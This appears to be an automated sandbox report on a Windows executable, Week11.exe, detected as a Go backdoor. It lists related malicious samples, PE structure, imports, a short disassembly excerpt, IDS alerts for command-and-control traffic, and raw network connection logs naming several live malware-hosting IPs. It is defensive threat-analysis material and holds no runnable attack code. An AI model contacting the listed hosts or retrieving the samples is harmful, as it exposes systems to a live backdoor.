                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          188.130.206.243m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243/
                          93.185.159.253m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253/
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SVINT-ASNESm0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 188.130.206.243
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 188.130.206.243
                          na.elfGet hashmaliciousMirai, MoobotBrowse
                          • 188.130.200.140
                          FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsm0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106
                          SecuriteInfo.com.FileRepMalware.3248.17662.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 46.8.237.66
                          fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          • 46.8.237.66
                          Zo1o3PhmtM.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          67JPbskewt.exeGet hashmaliciousUnknownBrowse
                          • 46.8.237.66
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.236.61
                          nabspc.elfGet hashmaliciousUnknownBrowse
                          • 109.248.104.45
                          VDSINA-ASRUfile.exeGet hashmaliciousRedLine, XWormBrowse
                          • 195.2.71.183
                          #U2749VER CUENTA#U2749_#U2464#U2466#U2460#U2462#U2463#U2460#U2466#U2462.htaGet hashmaliciousUnknownBrowse
                          • 62.113.116.63
                          6725c86d7fc7f.vbsGet hashmaliciousUnknownBrowse
                          • 62.113.116.63
                          6725c86d7fc7b.vbsGet hashmaliciousUnknownBrowse
                          • 62.113.116.63
                          #U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.htaGet hashmaliciousUnknownBrowse
                          • 109.234.39.156
                          #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.htaGet hashmaliciousUnknownBrowse
                          • 109.234.39.156
                          qxRux57rXE.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                          • 195.2.79.32
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 94.103.85.114
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 94.103.85.114
                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                          • 94.103.90.9
                          I3B-ASATXWHcHAzqPR.exeGet hashmaliciousUnknownBrowse
                          • 195.16.240.249
                          byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                          • 195.16.237.179
                          m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                          • 195.16.243.93
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                          • 93.185.159.253
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 93.185.159.253
                          No context
                          No context
                          Process:C:\Users\user\Desktop\Week11.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):416
                          Entropy (8bit):6.250698587156274
                          Encrypted:false
                          SSDEEP:12:4Mb8aSLQVw8h05a2RpqaHwnJAjUpqqUss5vU:bgaxVwo0d4sUpqqUu
                          MD5:75D8C920F037EE923D1A486C1405C384
                          SHA1:94E2E0B7D82A87175CC221569561CDC2A0716F72
                          SHA-256:B16F92F9C2861265E8581C8DBB54694EE6FE692B96F404841BDDF61E80CB37ED
                          SHA-512:134E5BE4D0293B4DCDDCE640566565622E446D4B2BF45F117B626FE221D3D66628B0C4E0D40714CFEA4D7A8C0B6C4594BDF88DC30AC2882B18EB4D30CA51E247
                          Malicious:false
                          Reputation:low
                          Preview:.![-.=...$"..+].ST:?A4.WL.9Q]^%\XT.1M.%.Q$.W@.[.Q%-.Z2..\S1?M-..X..(^2.$UV.(E#.Y...1..)>.7S?..;.Y?;.F.0"A_Y.W.\._$.-@._>[],-GPV(\".%P(Y1_.V^@..?U..RX4..B(Z..V.<.#.*........S"..A.X_L:_!PP48]...MV.!XT,ZVP1 V%W.GP78_.\$V["*PQ&.@.]0Q<V.\.Z.]..=O\...1.Z.+.)..4P._..TQ.6L ..F..#W.0"RW9*G+2?\4:.R7[4[.1.@W.?R5./_.T.XQ..M9..PUT8_.\QO.-^.,.8..:?...V.>3 T...L]7$F."(_?.,[6-.Q?/*@.&.R[\.Z!Z ^S..MX.'[%..^ >2U?.(G7.&\.P.WY.?Z.S
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.35629862468688
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Week11.exe
                          File size:8'848'896 bytes
                          MD5:4fbc4f26e90324c3b535943452460761
                          SHA1:032f96166bb573c9029f65aefb91d22b8a4940ed
                          SHA256:82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148
                          SHA512:a6e2bf5a0f5268aaae2dd21f1fede5be9a6afc9bf967438578fd4809a58859ce873c6aa3fc95ec65e2a29470577c4ffa8f0ad186f410f76533d5b2e5d7094c09
                          SSDEEP:98304:O3joQ1BjUhH1aOFHyq0KqSYLsDu0eK0DuCglDboo:ijUhVa2HyqgLIuXKyu1R0o
                          TLSH:EF96AEAB09176DD5EEF84F719728E99A4396C463B93CC1BEBB4764A8C211BC344E03D4
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.......,.......,...B...,...A...,...W...,...-...,.......,.....i.,.......,.......,.......,.......,.Rich..,........
                          Icon Hash:615545d4aaa2d423
                          Entrypoint:0x48eb4e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x5F92B0F1 [Fri Oct 23 10:31:13 2020 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:44c9a0d6caae769769c87976fb6f71d4
                          Signature Valid:
                          Signature Issuer:
                          Signature Validation Error:
                          Error Number:
                          Not Before, Not After
                            Subject Chain
                              Version:
                              Thumbprint MD5:
                              Thumbprint SHA-1:
                              Thumbprint SHA-256:
                              Serial:
                              Instruction
                              call 00007F085CB7FBF9h
                              jmp 00007F085CB71A4Eh
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ebx
                              mov eax, dword ptr [ebp+0Ch]
                              add eax, 0Ch
                              mov dword ptr [ebp-04h], eax
                              mov ebx, dword ptr fs:[00000000h]
                              mov eax, dword ptr [ebx]
                              mov dword ptr fs:[00000000h], eax
                              mov eax, dword ptr [ebp+08h]
                              mov ebx, dword ptr [ebp+0Ch]
                              mov ebp, dword ptr [ebp-04h]
                              mov esp, dword ptr [ebx-04h]
                              jmp eax
                              pop ebx
                              leave
                              retn 0008h
                              pop eax
                              pop ecx
                              xchg dword ptr [esp], eax
                              jmp eax
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push ecx
                              push ecx
                              push ebx
                              push esi
                              push edi
                              mov esi, dword ptr fs:[00000000h]
                              mov dword ptr [ebp-04h], esi
                              mov dword ptr [ebp-08h], 0048EBBCh
                              push 00000000h
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp-08h]
                              push dword ptr [ebp+08h]
                              call 00007F085CB8A6A3h
                              mov eax, dword ptr [ebp+0Ch]
                              mov eax, dword ptr [eax+04h]
                              and eax, FFFFFFFDh
                              mov ecx, dword ptr [ebp+0Ch]
                              mov dword ptr [ecx+04h], eax
                              mov edi, dword ptr fs:[00000000h]
                              mov ebx, dword ptr [ebp-04h]
                              mov dword ptr [ebx], edi
                              mov dword ptr fs:[00000000h], ebx
                              pop edi
                              pop esi
                              pop ebx
                              leave
                              retn 0008h
                              push ebp
                              mov ebp, esp
                              sub esp, 08h
                              push ebx
                              push esi
                              push edi
                              cld
                              mov dword ptr [ebp-04h], eax
                              xor eax, eax
                              push eax
                              push eax
                              push eax
                              push dword ptr [ebp-04h]
                              push dword ptr [ebp+14h]
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
                              call 00007F085CB807BDh
                              add esp, 20h
                              mov dword ptr [ebp-08h], eax
                              pop edi
                              pop esi
                              pop ebx
                              mov eax, dword ptr [ebp+00h]
                              Programming Language:
                              • [C++] VS2008 build 21022
                              • [C++] VS2005 build 50727
                              • [ C ] VS2005 build 50727
                              • [IMP] VS2005 build 50727
                              • [ASM] VS2008 SP1 build 30729
                              • [ C ] VS2008 SP1 build 30729
                              • [C++] VS2008 SP1 build 30729
                              • [RES] VS2008 build 21022
                              • [LNK] VS2008 SP1 build 30729
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xd771c0x190.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe90000x790d5c.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x1238980x37a8.rsrc
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x11b0000x9dd0.rsrc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb8c100x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc67200x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xb80000x8ac.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xb70000xb6c00209499c11726f362ccd66f1fbadf0dd2False0.5103921746751026data6.788533709823602IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0xb80000x230000x22800eb91e1596f235b3413d6fa622b45c87aFalse0.32765794836956524data4.672379036995675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xdb0000xe0000x6000d2bdce02712eb535a94a1cb6ac8c2cc2False0.2332763671875OpenPGP Public Key4.3556072570206315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xe90000x790d5c0x790e00067ffc953e40fa64a98d03031022ba0aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              UIDATA0xe93c40x29e4aZip archive data, at least v1.0 to extract, compression method=storeEnglishUnited States0.14798885741925707
                              UIDATA0x1132100x1774XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminatorsEnglishUnited States0.14723517654896737
                              UIDATA0x1149840x10beUnicode text, UTF-16, little-endian text, with CRLF line terminatorsEnglishUnited States0.1532897806812879
                              RT_ICON0x115a440xaae0PC bitmap, Windows 3.x format, 6329 x 2 x 41, image size 44655, cbSize 43744, bits offset 540.5107671909290417
                              RT_ICON0x1205240x86eePC bitmap, Windows 3.x format, 4542 x 2 x 53, image size 34904, cbSize 34542, bits offset 540.422992299229923
                              RT_ICON0x128c140x3e9bPC bitmap, Windows 3.x format, 2443 x 2 x 46, image size 16391, cbSize 16027, bits offset 540.4940413052973108
                              RT_ICON0x12cab00x1817dPC bitmap, Windows 3.x format, 12386 x 2 x 41, image size 98844, cbSize 98685, bits offset 540.4911992704058368
                              RT_ICON0x144c300x730236PC bitmap, Windows 3.x format, 942397 x 2 x 51, image size 7537883, cbSize 7537206, bits offset 540.6396074295043945
                              RT_ICON0x874e680xffbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8944023466145197
                              RT_ICON0x875e640x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.04948132780082987
                              RT_ICON0x87840c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.0825515947467167
                              RT_ICON0x8794b40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.19858156028368795
                              RT_RCDATA0x87991c0x80dataEnglishUnited States1.0859375
                              RT_GROUP_ICON0x87999c0x3edataEnglishUnited States0.8064516129032258
                              RT_VERSION0x8799dc0x380dataEnglishUnited States0.43191964285714285
                              DLLImport
                              KERNEL32.dllExitThread, CreateThread, ExitProcess, GetStartupInfoW, RtlUnwind, HeapReAlloc, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, GetStdHandle, GetModuleFileNameA, GetTimeFormatA, GetDateFormatA, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, GetConsoleCP, GetConsoleMode, LCMapStringA, SetHandleCount, GetFileType, GetStartupInfoA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetStringTypeA, GetStringTypeW, IsDebuggerPresent, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, GetProcessHeap, CreateFileA, SetEnvironmentVariableA, SetUnhandledExceptionFilter, HeapAlloc, TerminateProcess, GetFileSizeEx, LocalFileTimeToFileTime, GetLocaleInfoW, CompareStringA, GetShortPathNameW, SetEndOfFile, FlushFileBuffers, GlobalFlags, GlobalAddAtomW, GlobalFindAtomW, lstrcmpiA, GetTempFileNameW, OpenMutexW, ReleaseMutex, HeapWalk, HeapLock, OpenThread, HeapUnlock, OutputDebugStringW, SetFilePointerEx, IsProcessorFeaturePresent, GlobalDeleteAtom, LoadLibraryA, GetVersionExA, UnhandledExceptionFilter, HeapFree, lstrlenA, lstrcmpA, CompareStringW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetFullPathNameW, GetLogicalDriveStringsW, DeviceIoControl, InterlockedExchange, MoveFileW, GetFileAttributesW, RemoveDirectoryW, FindClose, FindNextFileW, FindFirstFileW, QueryPerformanceCounter, SetFileAttributesW, lstrcmpW, GlobalAlloc, GlobalLock, GlobalUnlock, SetErrorMode, SetEnvironmentVariableW, GetCommandLineW, ExpandEnvironmentStringsW, lstrcmpiW, lstrlenW, SetFilePointer, InterlockedIncrement, ProcessIdToSessionId, FreeResource, GetSystemWindowsDirectoryW, LocalAlloc, SystemTimeToFileTime, GetModuleHandleA, GetTimeZoneInformation, LocalFree, GlobalFree, CreateMutexW, FreeConsole, GetCurrentProcessId, LoadLibraryExW, GetTempPathW, GetDriveTypeW, GetWindowsDirectoryW, GetUserDefaultUILanguage, SetCurrentDirectoryW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, Sleep, InterlockedCompareExchange, GetVersionExW, GetModuleFileNameW, MultiByteToWideChar, WriteFile, ReadFile, GetFileSize, CreateFileW, CopyFileW, FreeLibrary, LoadLibraryW, GetModuleHandleW, GetProcAddress, InterlockedDecrement, MulDiv, GetCurrentProcess, SetEvent, CreateEventW, ResetEvent, GetTickCount, WaitForSingleObject, WideCharToMultiByte, GetSystemTimeAsFileTime, DeleteFileW, GetVersion, GetSystemDirectoryW, SetLastError, RaiseException, DeleteCriticalSection, InitializeCriticalSection, CreateProcessW, GetLastError, OpenProcess, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, CloseHandle, LeaveCriticalSection, EnterCriticalSection, GetCurrentThreadId, FlushInstructionCache, GetUserDefaultLCID
                              USER32.dllGetWindowTextW, GetWindowTextLengthW, RedrawWindow, DrawTextW, DispatchMessageW, TranslateMessage, GetMessageW, SetWindowTextW, GetWindow, MonitorFromWindow, MapWindowPoints, IsRectEmpty, IsDialogMessageW, GetClientRect, DrawIconEx, DestroyIcon, GetActiveWindow, MessageBoxW, InvalidateRect, MonitorFromRect, PostQuitMessage, UnhookWindowsHookEx, GetLastActivePopup, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, ValidateRect, CallNextHookEx, SetWindowsHookExW, GetSysColorBrush, CheckMenuItem, EnableMenuItem, ModifyMenuW, SetCursor, GetDlgCtrlID, GetKeyState, GetWindowDC, BeginPaint, LoadBitmapW, SetWindowLongW, GetWindowLongW, DefWindowProcW, CallWindowProcW, GetWindowThreadProcessId, FindWindowW, SendMessageTimeoutW, IsWindow, KillTimer, GetMenuCheckMarkDimensions, DestroyWindow, GetWindowPlacement, ShowWindow, SetTimer, IsWindowVisible, RegisterClassExW, GetClassInfoExW, SetMenu, GetMessageTime, GetTopWindow, RemovePropW, GetPropW, SetPropW, GetCapture, WinHelpW, DestroyMenu, TabbedTextOutW, DrawTextExW, GrayStringW, EndPaint, SetCapture, ReleaseCapture, GetClassLongW, SetClassLongW, BringWindowToTop, SwitchToThisWindow, GetSystemMetrics, CharNextW, PeekMessageW, DestroyAcceleratorTable, InvalidateRgn, FillRect, CreateAcceleratorTableW, GetSysColor, GetClassNameW, GetDlgItem, IsChild, LoadImageW, LoadIconW, GetDesktopWindow, LoadCursorW, CreateWindowExW, EnableWindow, GetParent, SendMessageW, SetWindowPos, LoadStringW, UnregisterClassA, SetFocus, IsWindowEnabled, SetRectEmpty, RegisterWindowMessageW, GetDC, ReleaseDC, GetFocus, CopyRect, OffsetRect, ClientToScreen, GetMessagePos, PtInRect, ScreenToClient, MoveWindow, GetWindowRect, GetMonitorInfoW, AllowSetForegroundWindow, GetForegroundWindow, AttachThreadInput, SetForegroundWindow, SetActiveWindow, SetMenuItemBitmaps, IsIconic, SystemParametersInfoA, GetMenu, AdjustWindowRectEx, RegisterClassW, PostMessageW, GetKeyboardState, keybd_event, GetClassInfoW
                              GDI32.dllScaleWindowExtEx, PtVisible, SetWindowExtEx, SetMapMode, RestoreDC, SaveDC, ExtTextOutW, GetClipBox, CreateBitmap, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, Escape, TextOutW, RectVisible, GetStockObject, BitBlt, SetViewportOrgEx, GetPixel, CreateCompatibleBitmap, CreateFontW, SetTextColor, SetBkColor, CreateSolidBrush, GetTextExtentPoint32W, GetTextMetricsW, GetObjectA, GetObjectW, SelectObject, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps
                              WINSPOOL.DRVClosePrinter, DocumentPropertiesW, OpenPrinterW
                              ADVAPI32.dllRegOpenKeyExA, ConvertSidToStringSidW, RegQueryValueExA, RegDeleteValueW, RegEnumKeyExW, RegQueryInfoKeyW, RegDeleteKeyW, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, RegCreateKeyExW, RegSetValueExW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegEnumKeyExA
                              SHELL32.dllSHOpenFolderAndSelectItems, SHGetMalloc, SHGetSpecialFolderLocation, DragAcceptFiles, DragFinish, DragQueryFileW, SHGetFileInfoW, ShellExecuteExW, ShellExecuteW, SHGetPathFromIDListW, SHGetSpecialFolderPathW, SHGetFolderPathW
                              ole32.dllOleLockRunning, StringFromGUID2, OleUninitialize, OleInitialize, CoCreateInstance, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoUninitialize, CoGetClassObject, CLSIDFromProgID, CLSIDFromString, CreateStreamOnHGlobal
                              OLEAUT32.dllVariantChangeType, LoadTypeLib, LoadRegTypeLib, SysStringLen, OleCreateFontIndirect, VarUI4FromStr, SysAllocStringLen, VarBstrCmp, SafeArrayUnlock, SafeArrayLock, SafeArrayDestroy, SafeArrayCreate, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, SafeArrayCopy, SafeArrayGetVartype, DispCallFunc, VariantInit, VariantClear, SysAllocString, SysFreeString
                              SHLWAPI.dllStrCmpIW, PathCompactPathW, PathStripPathW, PathFindFileNameW, PathIsDirectoryW, PathAddBackslashW, StrStrIW, PathRemoveFileSpecW, PathAppendW, PathCombineW, SHSetValueA, SHGetValueA, PathFileExistsW, ColorHLSToRGB, ColorRGBToHLS, SHGetValueW, wnsprintfW
                              COMCTL32.dllInitCommonControlsEx
                              gdiplus.dllGdipDeletePrivateFontCollection, GdipNewPrivateFontCollection, GdipDrawImageRectRectI, GdipDrawLine, GdipAddPathEllipseI, GdipGetPathGradientPointCount, GdipSetPathGradientSurroundColorsWithCount, GdipSetPathGradientCenterColor, GdipCreatePathGradientFromPath, GdipCreateFromHWND, GdipGetFontHeight, GdipCreatePen2, GdipDrawRectangleI, GdipCreateLineBrushFromRect, GdipAddPathRectangleI, GdipPrivateAddMemoryFont, GdipSetPenWidth, GdipDrawEllipseI, GdipSetPenDashOffset, GdipAddPathLineI, GdipSetPixelOffsetMode, GdipDrawImageRectI, GdipGetImageGraphicsContext, GdipGetImagePixelFormat, GdipDrawImagePointRectI, GdipResetWorldTransform, GdipCreateBitmapFromScan0, GdipDrawPath, GdipFillPath, GdipSetSmoothingMode, GdipGetSmoothingMode, GdipResetClip, GdipCreatePath, GdipFillRectangleI, GdipRotateWorldTransform, GdipGetPixelOffsetMode, GdipTranslateWorldTransform, GdipSetClipRectI, GdipSetTextRenderingHint, GdipCreateFont, GdipGetFontCollectionFamilyList, GdipCreateLineBrushFromRectI, GdipClosePathFigure, GdipAddPathArcI, GdipResetPath, GdipDrawString, GdipMeasureString, GdipSetStringFormatAlign, GdipSetStringFormatLineAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipDeleteFont, GdipCreateFontFromLogfontA, GdipCreateFontFromDC, GdipDrawRectangle, GdipDrawLineI, GdipSetPenDashStyle, GdipDeletePen, GdipCreatePen1, GdipBitmapSetPixel, GdipBitmapGetPixel, GdipGetImageHeight, GdipGetImageWidth, GdipCreateBitmapFromFile, GdipCloneImage, GdipDisposeImage, GdipFillRectangle, GdipCloneBrush, GdipAlloc, GdipFree, GdipDeleteBrush, GdipCreateSolidFill, GdipDeleteGraphics, GdipCreateFromHDC, GdipCreateBitmapFromStream, GdipSetPathGradientGammaCorrection, GdipSetPathGradientCenterPoint, GdipAddPathLine2, GdipGetPathWorldBoundsI, GdipAddPathPie, GdipAddPathLine, GdipAddPathArc, GdipSaveImageToFile, GdipGetImageEncoders, GdipGetImageEncodersSize, GdipSetInterpolationMode, GdipCloneFontFamily, GdipDeleteFontFamily, GdipDeletePath, GdipSetLinePresetBlend
                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                              WININET.dllInternetCloseHandle, HttpQueryInfoW, InternetSetOptionW, InternetReadFile, InternetOpenUrlW, DeleteUrlCacheEntryW, InternetOpenW
                              PSAPI.DLLGetModuleFileNameExW
                              IMM32.dllImmDisableIME
                              RPCRT4.dllNdrAsyncClientCall, RpcAsyncInitializeHandle, RpcStringBindingComposeW, RpcBindingFromStringBindingW, RpcAsyncCompleteCall, RpcStringFreeW, RpcBindingFree
                              OLEACC.dllLresultFromObject, CreateStdAccessibleObject
                              WTSAPI32.dllWTSQuerySessionInformationW
                              USERENV.dllGetUserProfileDirectoryW
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-11T17:57:20.153843+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2194.103.88.12728670192.168.2.549709TCP
                              2024-11-11T17:57:20.154104+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.54970994.103.88.12728670TCP
                              2024-11-11T17:57:30.483613+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.549716TCP
                              2024-11-11T17:57:49.549151+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.54970994.103.88.12728670TCP
                              2024-11-11T17:57:49.784386+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1194.103.88.12728670192.168.2.549709TCP
                              2024-11-11T17:57:58.288467+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.557077TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 11, 2024 17:57:14.942672014 CET4970480192.168.2.546.8.232.106
                              Nov 11, 2024 17:57:14.947714090 CET804970446.8.232.106192.168.2.5
                              Nov 11, 2024 17:57:14.947854042 CET4970480192.168.2.546.8.232.106
                              Nov 11, 2024 17:57:14.949439049 CET4970480192.168.2.546.8.232.106
                              Nov 11, 2024 17:57:14.954346895 CET804970446.8.232.106192.168.2.5
                              Nov 11, 2024 17:57:15.630495071 CET804970446.8.232.106192.168.2.5
                              Nov 11, 2024 17:57:15.656373024 CET4970580192.168.2.546.8.236.61
                              Nov 11, 2024 17:57:15.661288023 CET804970546.8.236.61192.168.2.5
                              Nov 11, 2024 17:57:15.661420107 CET4970580192.168.2.546.8.236.61
                              Nov 11, 2024 17:57:15.661811113 CET4970580192.168.2.546.8.236.61
                              Nov 11, 2024 17:57:15.666580915 CET804970546.8.236.61192.168.2.5
                              Nov 11, 2024 17:57:15.678107023 CET4970480192.168.2.546.8.232.106
                              Nov 11, 2024 17:57:16.317673922 CET804970546.8.236.61192.168.2.5
                              Nov 11, 2024 17:57:16.366842031 CET4970580192.168.2.546.8.236.61
                              Nov 11, 2024 17:57:16.373636961 CET4970680192.168.2.593.185.159.253
                              Nov 11, 2024 17:57:16.378559113 CET804970693.185.159.253192.168.2.5
                              Nov 11, 2024 17:57:16.378653049 CET4970680192.168.2.593.185.159.253
                              Nov 11, 2024 17:57:16.382776976 CET4970680192.168.2.593.185.159.253
                              Nov 11, 2024 17:57:16.387643099 CET804970693.185.159.253192.168.2.5
                              Nov 11, 2024 17:57:17.074347019 CET804970693.185.159.253192.168.2.5
                              Nov 11, 2024 17:57:17.095859051 CET4970780192.168.2.591.212.166.91
                              Nov 11, 2024 17:57:17.100907087 CET804970791.212.166.91192.168.2.5
                              Nov 11, 2024 17:57:17.101011038 CET4970780192.168.2.591.212.166.91
                              Nov 11, 2024 17:57:17.102101088 CET4970780192.168.2.591.212.166.91
                              Nov 11, 2024 17:57:17.107034922 CET804970791.212.166.91192.168.2.5
                              Nov 11, 2024 17:57:17.117932081 CET4970680192.168.2.593.185.159.253
